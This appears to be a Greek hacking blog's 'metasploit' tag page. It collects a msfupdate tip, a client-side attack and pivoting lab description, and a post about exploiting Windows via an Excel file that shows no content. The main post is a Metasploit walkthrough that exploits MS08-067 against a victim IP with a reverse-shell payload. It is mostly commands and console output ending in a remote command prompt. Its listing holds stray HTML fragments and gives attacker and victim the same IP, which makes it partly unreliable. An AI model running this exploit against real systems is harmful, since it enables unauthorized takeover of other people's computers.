Kατεβάσετε την εφαρμογή android του blog! DownLoad

FoulsCode: 2011-17

Translate

Πρόσφατα Σχόλια

Σύνολο αναρτήσεων

Συνολικές προβολές σελίδας

Εμφάνιση αναρτήσεων με ετικέτα metasploit. Εμφάνιση όλων των αναρτήσεων
Εμφάνιση αναρτήσεων με ετικέτα metasploit. Εμφάνιση όλων των αναρτήσεων

Πως κάνουμε αναβάθμιση το msfconsole?

Written By Fouls Code on Κυριακή, 21 Μαΐου 2017 | Μαΐου 21, 2017



Καλησπέρα σας αν έχετε καιρό που δουλεύετε το msf ήρθε η ώρα για ένα update.
Η διαδικασία είναι απλή. Ανοίγουμε εν τερματικό, και στην συνεχεια πληκτρολογούμε την παρακάτω εντολή!

root@Kail-flames:~# msfupdate
Μαΐου 21, 2017 | 0 σχόλια | Διαβάστε περισσότερα

Exploit Windows just with an excel document

Written By Fouls Code on Πέμπτη, 18 Μαΐου 2017 | Μαΐου 18, 2017







Μαΐου 18, 2017 | 0 σχόλια | Διαβάστε περισσότερα

Client side attack





*** There is a sound problem on video ***




You are a Penetration Tester and you’re asked to determine if the

corporate network is secure and if we are able to reach the servers

withing the DMZ.

The internal corporate network is divided in two

segments: the internal network where the employees machine reside and

the DMZ where there are company servers.

######## GOALS #############

1) Gain access to the internal network

2) Exploit and get a shell to a server within the DMZ




############WHAT YOU WILL LEARN ################

1) How to use Client-Side attacks

2) Pivoting

3) Fingerprint Hosts and Services though Pivoting

To guide you during the lab you will find different Tasks.

Tasks are meant for educational purposes and to show you the usage of

different tools and different methods to achieve the same goal.

They are not meant to be used as a methodology.




RECOMMENDED TOOLS

1)metasploit

2) nmap

3) proxychains

4) Mail client ( i.e. Thunderbird )




IMPORTANT N OTE

Labs machines (like web server and internal organization machines)

are not connected to the internet.


Μαΐου 18, 2017 | 0 σχόλια | Διαβάστε περισσότερα

Πρόσβαση σε απόμακρο υπολογιστή με χρήση του ms08_, ex067_netapi exploit

Written By Fouls Code on Τρίτη, 17 Ιανουαρίου 2017 | Ιανουαρίου 17, 2017



Σε αυτό το tutorial θα δούμε έναν από τους τρόπους με τους οποίους μπορούμε να αποκτήσουμε τον έλεγχο σε ένα απομακρυσμένο υπολογιστή με τη χρήση του ms08_067_netapi exploit.




Ανοίγω ένα τερματικό...
Terminal: 
root@bt:msfconsole <- font="">
[περιμένουμε να ενεργοποιηθεί λίγο το msfconsole]...
msf > search ms08_067_netapi <- font="">

[*] Searching loaded modules for pattern 'ms08_067_netapi'...
Exploits
========
Name
----
windows/smb/ms08_067_netapi
Corruption
Rank
----
great
Description
-----------
Microsoft Server Service Relative Path Stack


Συνχίζουμε γράφοντας τις παρακάτω εντολές...



msf > use windows/smb/ms08_067_netapi <- span="">
msf exploit(ms08_067_netapi) > show options <- span="">
msf exploit(ms08_067_netapi) > set RHOST 192.168.33.130 <- ip="" span="" victim="">
RHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp <- span="">
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options <- span="">
msf exploit(ms08_067_netapi) > set LHOST 192.168.33.130 <- attacker="" ip="" span="">
LHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > exploit <- span="">

[*] Started reverse handler on 192.168.33.129:8080
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1487)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

GAME OVER!!!

Όπως φαίνεται παραπάνω μπήκαμε στον υπολογιστή του θύματος μας και έχουμε μπροστά μας το μενού εντολών του MS-DOS... Από εκεί και πέρα μπορούμε να κάνουμε ότι θέλουμε αρκεί να γνωρίζουμε έστω και λίγες εντολές του MS-DOS.

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

via: securitydnainfo.blogspot.gr
Ιανουαρίου 17, 2017 | 0 σχόλια | Διαβάστε περισσότερα
 
berita unik